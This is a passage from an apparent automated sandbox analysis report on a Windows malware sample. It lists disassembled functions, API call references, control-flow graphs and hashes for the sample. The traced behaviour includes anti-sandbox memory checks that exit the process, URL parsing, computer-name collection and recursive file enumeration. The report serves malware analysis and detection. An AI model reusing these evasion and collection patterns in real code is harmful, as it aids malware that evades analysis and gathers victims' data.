                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                            • String ID: :\$C
                            • API String ID: 2572753744-3309953409
                            • Opcode ID: 94f8111c7f352772e809de5bd02a6660419f09e73b211cd72e38acb7e55a4f41
                            • Instruction ID: d74664ec87a7ba5c395267d9eeb6be226c98c69adc82047ccf57b7fe8c19063e
                            • Opcode Fuzzy Hash: 94f8111c7f352772e809de5bd02a6660419f09e73b211cd72e38acb7e55a4f41
                            • Instruction Fuzzy Hash: C0319EB1D0820A9FCB04DFB889959EFBFBDEF58750F10416AE615F7650E2348A408BA1
                            Function 006D4BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2793 6d4bc0-6d4bce 2794 6d4bd0-6d4bd5 2793->2794 2794->2794 2795 6d4bd7-6d4c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 6d2a20 2794->2795
                            APIs
                            • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 006D4BF7
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 006D4C01
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 006D4C0B
                            • lstrlen.KERNEL32(?,00000000,?), ref: 006D4C1F
                            • InternetCrackUrlA.WININET(?,00000000), ref: 006D4C27
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ??2@$CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1683549937-4251816714
                            • Opcode ID: 498048f3e0dbb537b637885092e66d08fc09995ffcd85b208e660317e9842a53
                            • Instruction ID: a0d53c0aa9d07dc5394cc5f264e6c8d4ed6564ef4e79d7ee3c7e124ebade5e10
                            • Opcode Fuzzy Hash: 498048f3e0dbb537b637885092e66d08fc09995ffcd85b208e660317e9842a53
                            • Instruction Fuzzy Hash: B5011771D00218AFDB10DFA9E845B9EBBA9EB58320F00812AF954E7390EB7499058BD4
                            Function 006D1030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2798 6d1030-6d1055 GetCurrentProcess VirtualAllocExNuma 2799 6d105e-6d107b VirtualAlloc 2798->2799 2800 6d1057-6d1058 ExitProcess 2798->2800 2801 6d107d-6d1080 2799->2801 2802 6d1082-6d1088 2799->2802 2801->2802 2803 6d108a-6d10ab VirtualFree 2802->2803 2804 6d10b1-6d10b6 2802->2804 2803->2804
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 006D1046
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 006D104D
                            • ExitProcess.KERNEL32 ref: 006D1058
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006D106C
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 006D10AB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                            • String ID:
                            • API String ID: 3477276466-0
                            • Opcode ID: 3e059686ee8b2f7ca96c0a572b2c99032d8c872c12743fa2ac10bf35ed9ca558
                            • Instruction ID: 9f9706fbf384d91ec002fb87b75d7cf367016b175f0c066a19923274d9068754
                            • Opcode Fuzzy Hash: 3e059686ee8b2f7ca96c0a572b2c99032d8c872c12743fa2ac10bf35ed9ca558
                            • Instruction Fuzzy Hash: 2B01D1717842047FE7205A656C1AFAB77ADA785B05F208415F744EB380D9B1A9009664
                            Function 006EEE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2805 6eee90-6eeeb5 call 6d2930 2808 6eeec9-6eeecd call 6d6c40 2805->2808 2809 6eeeb7-6eeebf 2805->2809 2812 6eeed2-6eeee8 StrCmpCA 2808->2812 2809->2808 2810 6eeec1-6eeec3 lstrcpy 2809->2810 2810->2808 2813 6eeeea-6eef02 call 6d2a20 call 6d2930 2812->2813 2814 6eef11-6eef18 call 6d2a20 2812->2814 2823 6eef04-6eef0c 2813->2823 2824 6eef45-6eefa0 call 6d2a20 * 10 2813->2824 2820 6eef20-6eef28 2814->2820 2820->2820 2822 6eef2a-6eef37 call 6d2930 2820->2822 2822->2824 2831 6eef39 2822->2831 2823->2824 2827 6eef0e-6eef0f 2823->2827 2830 6eef3e-6eef3f lstrcpy 2827->2830 2830->2824 2831->2830
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EEEC3
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 006EEEDE
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 006EEF3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID: ERROR
                            • API String ID: 3722407311-2861137601
                            • Opcode ID: 071f82ae81912ab5cb2ebf2bcf34aecf86d051635fa5b8ac20113306cc2bf578
                            • Instruction ID: 37ae860924aa0890d0c3dcd62b9a43be64501a720cf8edc46fa8610f7a5cef5b
                            • Opcode Fuzzy Hash: 071f82ae81912ab5cb2ebf2bcf34aecf86d051635fa5b8ac20113306cc2bf578
                            • Instruction Fuzzy Hash: CF2123B0A212569FCB71FF7ADC55B9A37A5EF24300F04552DB84ADB352DA31EC018794
                            Function 006D10C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2886 6d10c0-6d10cb 2887 6d10d0-6d10dc 2886->2887 2889 6d10de-6d10f3 GlobalMemoryStatusEx 2887->2889 2890 6d10f5-6d1106 2889->2890 2891 6d1112-6d1114 ExitProcess 2889->2891 2892 6d1108 2890->2892 2893 6d111a-6d111d 2890->2893 2892->2891 2894 6d110a-6d1110 2892->2894 2894->2891 2894->2893
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 803317263-2766056989
                            • Opcode ID: 10029b1fdc14666da23153847e06f4b389ab1e98b43a71d877d7e2af9f466fd0
                            • Instruction ID: 1b167efc091cc292d0f6446d435465795e2f551198e786b95ff2dd1f7928dc71
                            • Opcode Fuzzy Hash: 10029b1fdc14666da23153847e06f4b389ab1e98b43a71d877d7e2af9f466fd0
                            • Instruction Fuzzy Hash: 37F02770A182446BEB107A64DC0A32DF7DAEB53350F10492BDEDACA381E6B0C8809167
                            Function 006E8C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2895 6e8c88-6e8cc4 StrCmpCA 2898 6e8ccd-6e8ce6 2895->2898 2899 6e8cc6-6e8cc7 ExitProcess 2895->2899 2901 6e8cec-6e8cf1 2898->2901 2902 6e8ee2-6e8eef call 6d2a20 2898->2902 2903 6e8cf6-6e8cf9 2901->2903 2905 6e8cff 2903->2905 2906 6e8ec3-6e8edc 2903->2906 2908 6e8e6f-6e8e7d StrCmpCA 2905->2908 2909 6e8e88-6e8e9a lstrlen 2905->2909 2910 6e8d06-6e8d15 lstrlen 2905->2910 2911 6e8d84-6e8d92 StrCmpCA 2905->2911 2912 6e8da4-6e8db8 StrCmpCA 2905->2912 2913 6e8dbd-6e8dcb StrCmpCA 2905->2913 2914 6e8ddd-6e8deb StrCmpCA 2905->2914 2915 6e8dfd-6e8e0b StrCmpCA 2905->2915 2916 6e8e1d-6e8e2b StrCmpCA 2905->2916 2917 6e8e3d-6e8e4b StrCmpCA 2905->2917 2918 6e8d5a-6e8d69 lstrlen 2905->2918 2919 6e8e56-6e8e64 StrCmpCA 2905->2919 2920 6e8d30-6e8d3f lstrlen 2905->2920 2906->2902 2942 6e8cf3 2906->2942 2908->2906 2933 6e8e7f-6e8e86 2908->2933 2934 6e8e9c-6e8ea1 call 6d2a20 2909->2934 2935 6e8ea4-6e8eb0 call 6d2930 2909->2935 2929 6e8d1f-6e8d2b call 6d2930 2910->2929 2930 6e8d17-6e8d1c call 6d2a20 2910->2930 2911->2906 2924 6e8d98-6e8d9f 2911->2924 2912->2906 2913->2906 2925 6e8dd1-6e8dd8 2913->2925 2914->2906 2926 6e8df1-6e8df8 2914->2926 2915->2906 2927 6e8e11-6e8e18 2915->2927 2916->2906 2928 6e8e31-6e8e38 2916->2928 2917->2906 2931 6e8e4d-6e8e54 2917->2931 2921 6e8d6b-6e8d70 call 6d2a20 2918->2921 2922 6e8d73-6e8d7f call 6d2930 2918->2922 2919->2906 2932 6e8e66-6e8e6d 2919->2932 2936 6e8d49-6e8d55 call 6d2930 2920->2936 2937 6e8d41-6e8d46 call 6d2a20 2920->2937 2921->2922 2955 6e8eb3-6e8eb5 2922->2955 2924->2906 2925->2906 2926->2906 2927->2906 2928->2906 2929->2955 2930->2929 2931->2906 2932->2906 2933->2906 2934->2935 2935->2955 2936->2955 2937->2936 2942->2903 2955->2906 2956 6e8eb7-6e8eb9 2955->2956 2956->2906 2957 6e8ebb-6e8ebd lstrcpy 2956->2957 2957->2906
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 68f2fe4ee2f27c312bc201cfe2c33e3193b57482ed3e3a7a2975304de71cac4f
                            • Instruction ID: fdbdba755fad8fb14ab9a70032d8d7d66ad88de38ea92715a37b3199aa97e415
                            • Opcode Fuzzy Hash: 68f2fe4ee2f27c312bc201cfe2c33e3193b57482ed3e3a7a2975304de71cac4f
                            • Instruction Fuzzy Hash: 12E0D8A0114349EFD7206BB5CC549D7BBBCEF84704B00882CBA9A97252EA74AD00C354
                            Function 006F2AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2958 6f2ad0-6f2b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2959 6f2b44-6f2b59 2958->2959 2960 6f2b24-6f2b36 2958->2960
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 006F2AFF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006F2B06
                            • GetComputerNameA.KERNEL32(00000000,00000104), ref: 006F2B1A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 2a41d32a0cbfa7895eb237b076561c9c417bb4cb889fcc23e47055513adb72c1
                            • Instruction ID: 3dcb05bd867a79aeb217b54287a720a34aabd961ce117640b2d8dbd0fc192883
                            • Opcode Fuzzy Hash: 2a41d32a0cbfa7895eb237b076561c9c417bb4cb889fcc23e47055513adb72c1
                            • Instruction Fuzzy Hash: 4201D1B2A44208AFD710DF99EC45BAEF7B8F745B21F00026AFA19E3780D77419048BA1

                            Non-executed Functions

                            Function 006E2390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E23D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E23F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E2402
                            • lstrlen.KERNEL32(\*.*), ref: 006E240D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E242A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 006E2436
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E246A
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 006E2486
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: da554c58561651b24ab3af266b08d6861aa9bcd9453f5a73bd6acf63b989766d
                            • Instruction ID: 71d0c0d10da441489e6040fffde8aef0ebe2a33a4e175492261fb8fdf13e5bfb
                            • Opcode Fuzzy Hash: da554c58561651b24ab3af266b08d6861aa9bcd9453f5a73bd6acf63b989766d
                            • Instruction Fuzzy Hash: A3A29E71A163679FDB61AF76CCA8AAE77BBAF14300F044129B84997351DB34DD018B90
                            Function 006D16A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D16E2
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D1719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D176C
                            • lstrcat.KERNEL32(00000000), ref: 006D1776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D17A2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D17EF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D17F9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1825
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1875
                            • lstrcat.KERNEL32(00000000), ref: 006D187F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D18AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D18F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D18FE
                            • lstrlen.KERNEL32(00701794), ref: 006D1909
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1929
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D1935
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D195B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D1966
                            • lstrlen.KERNEL32(\*.*), ref: 006D1971
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D198E
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 006D199A
                              • Part of subcall function 006F4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 006F406D
                              • Part of subcall function 006F4040: lstrcpy.KERNEL32(00000000,?), ref: 006F40A2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D19C3
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1A0E
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D1A16
                            • lstrlen.KERNEL32(00701794), ref: 006D1A21
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1A41
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D1A4D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1A76
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D1A81
                            • lstrlen.KERNEL32(00701794), ref: 006D1A8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1AAC
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D1AB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1ADE
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D1AE9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1B11
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 006D1B45
                            • StrCmpCA.SHLWAPI(?,007017A0), ref: 006D1B70
